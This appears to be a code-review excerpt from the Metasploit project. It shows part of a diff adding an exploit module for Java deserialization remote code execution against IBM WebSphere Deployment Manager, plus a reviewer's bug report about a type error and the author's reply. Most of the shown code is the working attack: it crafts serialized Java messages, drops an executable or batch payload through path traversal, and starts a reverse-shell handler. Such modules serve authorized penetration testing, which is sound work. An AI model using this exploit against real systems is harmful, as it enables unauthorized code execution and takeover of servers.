modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb

```diff
@@ -0,0 +1,670 @@
+        OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
+      ]
+    )
+  end
+
+  def cleanup
+    disconnect
+    print_status("Disconnected from IBM Websphere DMGR.")
+    super
+  end
+
+  def exploit
+    # Manually start the handler if not running a single command
+    if datastore['CMD'].nil? || datastore['CMD'].empty?
+
+      # Set to nil if the cmd is empty for checks further down
+      datastore['CMD'] = nil
+      datastore['DisablePayloadHandler'] = false
+
+      # Configure the payload handler
+      payload_instance.exploit_config = {
+        'active_timeout' => 300
+      }
+      # Setup the payload handler
+      payload_instance.setup_handler
+
+      # Start the payload handler
+      payload_instance.start_handler
+
+    end
+
+    # Connect to the BMC Patrol Agent
+    connect
+    print_status("Connected to IBM WAS DMGR.")
+
+    command = nil
+    if !datastore['CMD'].nil? && !datastore['CMD'].empty?
+      command = datastore['CMD']
+    end
+
+    node_port = datastore['RPORT']
+
+    # Send packet to add neighbor
+    enc_stream = construct_tcp_node_msg(node_port)
+    send_msg(enc_stream)
+
+    sock.get_once
+    print_status('Server responded')
+
+    # Generate binary name
+    bin_name = rand_text_alpha(8)
+    if command.nil?
+      payload_contents = generate_payload_exe(code: payload.generate).bytes.to_a
+      bin_name += ".exe"
+    else
+      payload_contents = command.to_s
+      print_status('Executing command: ' + payload_contents)
+      bin_name += ".bat"
+    end
+
+    #payload_contents = "calc.exe"
+    print_status('Sending payload: ' + bin_name)
+    enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
+    send_msg(enc_stream)
+
+    # Handle the shell
+    handler
+  end
+
+  def send_msg(enc_stream)
+    pkt = [0x396fb74a].pack('N')
+    pkt += [enc_stream.length + 1].pack('N')
+    pkt += "\x00"
+    pkt += enc_stream
+
+    # Send msg
+    sock.put(pkt)
+  end
+
+  def construct_tcp_node_msg(node_port)
+    p2p_obj = Rex::Java::Serialization::Model::NewObject.new
+    p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
+
+    # Create the obj
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
+
+    # Create the stream and add the object
+    stream = Rex::Java::Serialization::Model::Stream.new
+    stream.contents = []
+    stream.contents << object
+    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
+    stream.contents << Rex::Java::Serialization::Model::NullReference.new
+    stream.encode
+  end
+
+  def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
+    # Add upload file argument
+    byte_arr = byte_str.unpack("C*")
```

Comment:
If you have a payload set such as `windows/meterpreter/reverse_https`, and if `CMD` is emply, then `byte_str` isn't a string and is instead an array (based off of line 110}. With it being an array, it'll throw a `NoMethodError `for the unpack.

Reply:
Nice catch, the call to ".bytes.to_a" snuck in there during testing.